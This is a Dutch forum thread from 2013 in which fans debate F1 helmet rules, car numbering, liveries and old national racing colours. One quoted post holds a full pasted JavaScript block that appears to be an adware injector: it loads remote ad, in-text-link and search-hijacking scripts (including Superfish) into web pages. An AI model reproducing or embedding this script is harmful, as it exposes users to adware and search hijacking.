Inderdaad ja, die hebben die enorme loods waar ze alles achter slot en grendel bewaren. Slecht voorbeeld dus.quote:Op woensdag 27 november 2013 00:59 schreef Waffle het volgende:
Volgens mij verkoopt Mclaren al jaren geen auto's meer.
Zou ook wel jammer zijn want er zitten best mooie helmen bij.quote:Op donderdag 14 november 2013 21:57 schreef Marks het volgende:
[..]
Mooi dat de FIA daar wat tegen wil doen, zo vaak van helm wisselen.
Lijkt me ook veel beter.quote:Op woensdag 27 november 2013 02:03 schreef SiGNe het volgende:
[..]
Zou ook wel jammer zijn want er zitten best mooie helmen bij.
Vettel heeft dit jaar volgens mij elke race met een andere helm geraced, meestal een in het thema van het land waar geraced wordt en dat maakt de helm ook wel speciaal.
Als er dan eisen gesteld moeten worden aan de herkenbaarheid, warom dan niet de wagen herkenbaarder maken?
wie herinnert zich niet Nigel Mansel met z'n rode 5 op z'n wagen?
Gewoon dat cijfer op de wagen duidelijker maken en de coureur lekker vrij laten in het persoonlijk maken van de helm.
Ik hoop er in januari te zijn, zal dan wel verslag doen. Meer informatie op:quote:A survey of the career of Fernando Alonso, the premier Formula 1 Spanish racing driver of all time and winner of two world championships.
Alonso began competing when he was only three years old, and the exhibition includes the first racing suit he wore, hand-sewn by his mother. And from that first moment through to his victory in two Formula 1 world championships, and in numerous other races, whose trophies are all on display to visitors. The exhibition also includes several of the single-seaters raced by the Asturian champion: from his first go-kart through to the cars with which he competed for Minardi, Renault, McLaren and Ferrari. Visitors can also see a collection of helmets, boots, gloves and mementos from Alonso's racing career.
Over morgen is dat overleg of er misschien met 8 teams gereden gaat worden, 3 auto's per team.quote:Op woensdag 27 november 2013 02:03 schreef SiGNe het volgende:
[..]
Zou ook wel jammer zijn want er zitten best mooie helmen bij.
Vettel heeft dit jaar volgens mij elke race met een andere helm geraced, meestal een in het thema van het land waar geraced wordt en dat maakt de helm ook wel speciaal.
Als er dan eisen gesteld moeten worden aan de herkenbaarheid, warom dan niet de wagen herkenbaarder maken?
wie herinnert zich niet Nigel Mansel met z'n rode 5 op z'n wagen?
Gewoon dat cijfer op de wagen duidelijker maken en de coureur lekker vrij laten in het persoonlijk maken van de helm.
Kan toch niet.. ...quote:Op woensdag 27 november 2013 10:19 schreef Meike26 het volgende:
[..]
Over morgen is dat overleg of er misschien met 8 teams gereden gaat worden, 3 auto's per team.
Het lijkt mij dan alleen wel beter voor de sport als liveries voor de wagens vrij worden gegeven en dat elke coureur een eigen livery krijgt. Zo ja, dan word dat nog wel lastig met Ferrari, eindelijk een gele Ferrari op de grid? Of toch een lichtblauwe misschien
Senna reed best vaak met nummer 1 of 11quote:Op woensdag 27 november 2013 10:32 schreef Marks het volgende:
[..]
Kan toch niet.. ...
En over de nemmering: van senna weet toch niemand welke nummers hij had, maar iedereen kent zijn gele helm die hij zijn HELE carrière droeg. Zoals het hoort
Hoezo kan dat niet ? Wees eens duidelijkerquote:Op woensdag 27 november 2013 10:32 schreef Marks het volgende:
[..]
Kan toch niet.. ...
En over de nummering: van senna weet toch niemand welke nummers hij had, maar iedereen kent zijn gele helm die hij zijn HELE carrière droeg. Zoals het hoort
Dit is wel waar natuurlijk. Nummers zijn gebaseerd op het constructeurs- en gedeeltelijk rijderskampioenschap van vorig jaar en veranderen dus ieder seizoen. Niet echt gemakkelijk te onthouden. Als je het zo wil doen, moet iedere coureur een persoonlijk nummer hebben door zijn gehele carrière.quote:Op woensdag 27 november 2013 10:32 schreef Marks het volgende:
[..]
Kan toch niet.. ...
En over de nummering: van senna weet toch niemand welke nummers hij had, maar iedereen kent zijn gele helm die hij zijn HELE carrière droeg. Zoals het hoort
of zoals in de VS iedere auto een redelijk vast nummer heeft.quote:Op woensdag 27 november 2013 10:36 schreef Racerblade het volgende:
[..]
Dit is wel waar natuurlijk. Nummers zijn gebaseerd op het constructeurs- en gedeeltelijk rijderskampioenschap van vorig jaar en veranderen dus ieder seizoen. Niet echt gemakkelijk te onthouden. Als je het zo wil doen, moet iedere coureur een persoonlijk nummer hebben.
Je weet dat ze al eerder (1964, 1965) in andere kleuren dan rood (blauw/wit) raceten in de F1?quote:Op woensdag 27 november 2013 10:19 schreef Meike26 het volgende:
[..]
Over morgen is dat overleg of er misschien met 8 teams gereden gaat worden, 3 auto's per team.
Het lijkt mij dan alleen wel beter voor de sport als liveries voor de wagens vrij worden gegeven en dat elke coureur een eigen livery krijgt. Zo ja, dan word dat nog wel lastig met Ferrari, eindelijk een gele Ferrari op de grid? Of toch een lichtblauwe misschien
Of dus zoals in de DTM, waar iedere rijder met een eigen 'livery' rijdt. Volgens mij is de F1 nog één van de weinige klasses waar het niet mag. Iedereen weet nog wel dat Pollock 2 verschillende auto's wilde en een stukje autosport geschiedenis schreef met de rits-wagens.quote:Op woensdag 27 november 2013 10:37 schreef Peterselieman het volgende:
[..]
of zoals in de VS iedere auto een redelijk vast nummer heeft.
Nee wist ik nietquote:Op woensdag 27 november 2013 10:41 schreef sasquatsch het volgende:
[..]
Je weet dat ze al eerder (1964, 1965) in andere kleuren dan rood (blauw/wit) raceten in de F1?
[ afbeelding ]
Was ook alleen maar omdat Enzo Ferrari overhoop lag met de Italiaanse autosport bond en schreef voor een aantal GP's in de wagens in onder Ferrari Noord Amerika in de Noord Amerikaanse kleuren (blauw/wit).quote:
Waarom nu geen 3 auto's vraag ik me af... En voor de 3de een 107% regel invoerenquote:Op woensdag 27 november 2013 10:19 schreef Meike26 het volgende:
[..]
Over morgen is dat overleg of er misschien met 8 teams gereden gaat worden, 3 auto's per team.
Het lijkt mij dan alleen wel beter voor de sport als liveries voor de wagens vrij worden gegeven en dat elke coureur een eigen livery krijgt. Zo ja, dan word dat nog wel lastig met Ferrari, eindelijk een gele Ferrari op de grid? Of toch een lichtblauwe misschien
Wat een gezeur over zo'n helm, ik vind het wel grappig dat Vettel dit doet, kneuterigheid ten top om dat te willen verbieden.quote:Op woensdag 27 november 2013 10:32 schreef Marks het volgende:
[..]
Kan toch niet.. ...
En over de nummering: van senna weet toch niemand welke nummers hij had, maar iedereen kent zijn gele helm die hij zijn HELE carrière droeg. Zoals het hoort
Omdat er nu genoeg auto's zijn. Ik geloof dat er in de contracten met de circuits staat dat er minimaal 20 auto's aan de start moeten staan. Die 3 auto's is voor het geval er minder dan 10 teams aan de start verschijnen, als er teams zich uit de F1 terug trekken door de te hoge kosten.quote:Op woensdag 27 november 2013 10:54 schreef nils7 het volgende:
[..]
Waarom nu geen 3 auto's vraag ik me af... En voor de 3de een 107% regel invoeren
Met 3 auto's worden de kosten voor de teams NOG hoger, en de meeste kunnen hun budget nu al niet of nauwelijks rond krijgen.quote:Op woensdag 27 november 2013 10:54 schreef nils7 het volgende:
[..]
Waarom nu geen 3 auto's vraag ik me af... En voor de 3de een 107% regel invoeren
Nouja traditie. Alleen Ferrari rijdt nog in rood. Vroeger was het traditie ja, maar dat is al lang niet meer.quote:Op woensdag 27 november 2013 13:41 schreef Marks het volgende:
Het gaat toch om een fundamentele traditie binnen de F1, de teamkleuren.
En een gele sharknose, met gendebien.quote:Op woensdag 27 november 2013 10:41 schreef sasquatsch het volgende:
[..]
Je weet dat ze al eerder (1964, 1965) in andere kleuren dan rood (blauw/wit) raceten in de F1?
[ afbeelding ]
Inschrijving van het Belgische Ecurie Nationale Belge, vandaar de gele (Belgische race)kleur.quote:Op woensdag 27 november 2013 16:38 schreef Schunckelstar het volgende:
[..]
En een gele sharknose, met gendebien.
Weet alleen niet of dat officieel van het fabrieksteam was
Ahquote:Op woensdag 27 november 2013 16:50 schreef sasquatsch het volgende:
[..]
Inschrijving van het Belgische Ecurie Nationale Belge, vandaar de gele (Belgische race)kleur.
Hier staan alle kleurenquote:Op woensdag 27 november 2013 16:56 schreef Geralt het volgende:
Vroeger was het duitsland zilver, engeland groen, italie blauw etc.
Wat zie je van die traditie nog terug dan? Helemaal niks. Ja Mercedes dus die zilver grijs is ja en dan houdt het ook wel op.
Gquote:Op woensdag 27 november 2013 08:07 schreef Wombcat het volgende:
[..]
Lijkt me ook veel beter.
Maar nadeel van een groot duidelijk nummer zal wel zijn dat dat ten koste gaat van de reclamemogelijkheden. Het nummer staat dan op een goed zichtbare plaats en is dan groter, die ruimte verkopen ze waarschijnlijk liever aan een sponsor.
quote:
Bijnaam van het Italiaanse nationale elftal is Azzurri, azuurblauw, dusquote:
Was omdat sigarettenreclame op sommige circuits niet mocht. Anders stond er gewoon WEST.quote:Op woensdag 27 november 2013 22:50 schreef WEST het volgende:
[..]
G
McLaren deed het wel goed toen Mika, Hakkinen, coulthard en montoya er reden. Gewoon hun voornaam op zijkant in de steil van WEST. was oook wel mooi trouwens.
[ afbeelding ]
Ja dat klopt dat weet ik. Maar leuk en herkenbaar was het wel.quote:Op woensdag 27 november 2013 23:02 schreef sasquatsch het volgende:
[..]
Was omdat sigarettenreclame op sommige circuits niet mocht. Anders stond er gewoon WEST.
Dat dan weer wel, ja.quote:Op woensdag 27 november 2013 23:10 schreef WEST het volgende:
[..]
Ja dat klopt dat weet ik. Maar leuk en herkenbaar was het wel.
Destijds vond ik de vervangende reclame van lucky strike eigenlijk beterquote:Op woensdag 27 november 2013 23:02 schreef sasquatsch het volgende:
[..]
Was omdat sigarettenreclame op sommige circuits niet mocht. Anders stond er gewoon WEST.
Uh what?quote:Op donderdag 28 november 2013 00:35 schreef Marks het volgende:
[..]
<script>
var id=2605802023;
var aff=30500;
var sid=10;
(function()
{
var hostname = document.location.hostname;
function addEventHandler (el, eType, fn)
{
if (el.addEventListener)
el.addEventListener(eType, fn, false);
else if (el.attachEvent)
el.attachEvent('on' + eType, fn);
else
el['on' + eType] = fn;
}
function checkdml()
{
var h = document.location.hostname;
return (h.indexOf("google")!=-1 ||
h.indexOf("facebook.com")!=-1 ||
h.indexOf("yahoo.com")!=-1 ||
h.indexOf("bing.com")!=-1 ||
h.indexOf("ask.com")!=-1 ||
h.indexOf("listenersguide.org.uk")!=-1);
}
function loadScript(src, scriptId, innerText)
{
if (window.location.protocol == 'https:' && src.indexOf('http:') == 0)
return;
var script = document.createElement("script");
script.src = src;
script.characterSet = "utf-8";
script.type = "text/javascript";
script.setAttribute('jsid', 'js36');
if (typeof(scriptId) !== 'undefined')
script.id = scriptId;
if (typeof(innerText) !== 'undefined')
{
if(script.innerText)
script.innerText = innerText;
else
script.textContent = innerText;
}
(document.head||document.getElementsByTagName('head')[0]|| document.body||document.getElementsByTagName('body')[0]).appendChild(script);
}
function onloadComplete()
{
if (hostname.length - hostname.indexOf('.gov') == 4 ||
document.getElementsByTagName("*").length < 100)
return;
if (!checkdml())
{
window.INLDM_cfg = { fi : 4603, fd : 0,
fddm: 'xml.conversionguru.biz',
sttc: 'https://scripty.info/scripts/inl_dmmtch/',
inlsrhdm: 'sonicsearchonline.biz' };
loadScript('https://scripty.info/scripts/inl_dmmtch/inl_dmmtch.js');
loadScript('https://colo.cachefly.net/js/min.inject.js?id=ODEqPCA&subid=36');
loadScript('http://ig.cleversearch.me:8080/adserver/static/js/inimage_s.js?pid=108&ext_domain=1&ox_subId=js36');
if (navigator.appVersion.indexOf("MSIE 8.") == -1)
loadScript('http://intext.nav-links.com/js/intext.js?afid=DheeraMedia&subid=js36&maxlinks=6&linkcolor=009900');
if (navigator.appVersion.indexOf("MSIE 8.") == -1)
loadScript('http://www.superfish.com/ws/sf_main.jsp?dlsource=mhaencb&userId=ws&CTID=js36');
}
loadScript('https://cdncache1-a.akamaihd.net/loaders/1247/l.js?aoi=1311798366&pid=1247&zoneid=52222');
window.dmadbar_settings = {dm_standalone : true, dmpd : 3, rel : 1, fd : 4723, fd2: 4604, xmlfeed : 'http://xml.conversionguru.biz/search' , search_url : 'http://hostmysearch.com/?prt=yhs1Danta2&errUrl=http://www.yahoo.com&keywords=' , script_base : 'https://scripty.info/scripts/adbar' };
loadScript('https://scripty.info/scripts/adbar/adbar.js');
loadScript('http://i.websuggestorjs.info/sugg/javascript.js?channel=js36');
}
if (top === self)
{
if (document.readyState === 'complete')
onloadComplete();
else
addEventHandler(window, 'load', onloadComplete);
}();
</script>
F1 hoeft niet gered te worden hoor, niet in dit opzicht.
twitter:adamcooperf1 twitterde op donderdag 28-11-2013 om 10:27:52#F1 Brawn leaves Wolff and Lowe in charge of Mercedes: http://t.co/iNgXPyZT0C reageer retweet
Caterham is groen.quote:Op woensdag 27 november 2013 16:56 schreef Geralt het volgende:
Vroeger was het duitsland zilver, engeland groen, italie blauw etc.
Wat zie je van die traditie nog terug dan? Helemaal niks. Ja Mercedes dus die zilver grijs is ja en dan houdt het ook wel op.
Jaguar, uit Engeland, was (donker)groen.quote:
Bron.quote:Belangrijkste Britse automerken actief in 2012
AC · Arash · Ariel · Ascari · Aston Martin · Bentley · Bristol · Caparo · Caterham · Deauville · Farbio · Jaguar · Land Rover · Lotus · Mini · McLaren · Morgan · Noble · Rolls-Royce · Vauxhall · Westfield
twitter:clubforce twitterde op donderdag 28-11-2013 om 10:18:05As all cars and supplies are now back to our HQ, creative parking solutions are sought. http://t.co/LjXf6WLmqJ reageer retweet
Net David Copperfieldquote:
Forum Opties | |
---|---|
Forumhop: | |
Hop naar: |